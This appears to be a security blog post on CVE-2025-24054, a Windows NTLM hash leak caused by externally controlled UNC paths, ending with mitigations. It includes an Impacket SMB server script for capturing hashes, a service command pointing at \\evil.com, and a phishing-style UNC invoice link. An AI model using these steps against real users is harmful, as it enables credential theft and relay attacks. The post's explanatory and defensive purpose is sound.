In early 2025, security researchers identified a critical vulnerability affecting Windows systems that use NTLM authentication. This flaw, now tracked as CVE-2025-24054, allows attackers to externally control file names or paths processed by NTLM, which can be chained to perform network spoofing attacks. In this post, I'll break down what this vulnerability is, how it works with code snippets, the risk it brings, and how attackers can exploit it. I'll also provide links to original sources.
What is CVE-2025-24054?
CVE-2025-24054 occurs because some services using NTLM authentication on Windows do not validate or sanitize file names or path parameters received from external sources. This oversight allows an unauthorized user (attacker) to trick the system into processing malicious SMB paths or UNC locations that resolve to attacker-controlled servers.
In plain words: If a Windows app or service processes a file or path you can control (like \\attacker.com\share\payload.txt), your NTLM credentials might be sent out to the attacker's machine–letting them impersonate you or capture your password hash.
External control: Any untrusted user can specify a file or a path, not just local users.
- NTLM relay: Windows will try to authenticate to an attacker-controlled UNC path using the victim’s credentials.
- Spoofing and credential theft: With these credentials, attackers can attempt pass-the-hash or relay attacks on the network.
Proof-of-Concept: Triggering the Vulnerability
Here’s a simple Python proof-of-concept (PoC) script that demonstrates how an attacker could capture NTLM hashes using a UNC path combined with a popular SMB honeypot (Impacket’s Samba server).
# PoC attacker script using Impacket to capture NTLM hash
from impacket.examples import smbserver
if __name__ == "__main__":
server = smbserver.SimpleSMBServer(listenAddress="...", listenPort=445)
server.addShare("SHARE", "/tmp")
print("[*] SMB Server started on port 445, waiting for NTLM credentials...")
server.start()
Start this SMB server on your attacking machine.
2. Trick the victim (through phishing, or misusing an app/service) into opening or referencing a remote file:
Exploit Example With a Malicious Shortcut
Suppose we have a vulnerable Windows service that lets you specify a configuration file via a path argument. If an attacker sends this (or tricks a user to use it):
service.exe --config \\evil.com\share\config.xml
The service tries to authenticate to evil.com using NTLM. If the attacker's SMB server is listening (see above PoC), credentials are captured.
A Classic Scenario: Poisoning with Office Files or UNC Links
Attackers can also embed these malicious UNC paths in Microsoft Office documents, emails, or even instant messages:
Click this link to get your invoice:
\\malicious-server\docs\invoice.pdf
If the user clicks, Windows attempts authentication, and NTLM hashes get sent out.
Mitigations
- Disable NTLM in environments where possible (official Microsoft guidance).
Apply the latest Windows security patches.
- Harden SMB: Restrict outbound SMB traffic at the firewall so Windows can't connect to untrusted or external servers.
- Sanitize user input: If your app reads or writes files, validate that only expected, local names and paths are allowed.
References
- Microsoft Security Advisory - CVE-2025-24054
- Impacket SMB Capture Example
- Mitigating NTLM Relay Attacks
- UNC Path Attacks and Windows Security
Final Thoughts
CVE-2025-24054 demonstrates how even a simple external path or file parameter can expose an entire Windows network to spoofing attacks. Attackers just need you to ask Windows for a file on their server, and, unless protections are in place, they can grab your credentials or pretend to be you on the network.
Always keep your system updated, review your code for unsafe path handling, and restrict outbound SMB communications wherever possible.
Stay safe! If you like these deep dives, follow this blog for more exclusive CVE breakdowns and practical security guidance.
Timeline
Published on: 03/11/2025 17:16:27 UTC
Last modified on: 04/03/2025 21:15:21 UTC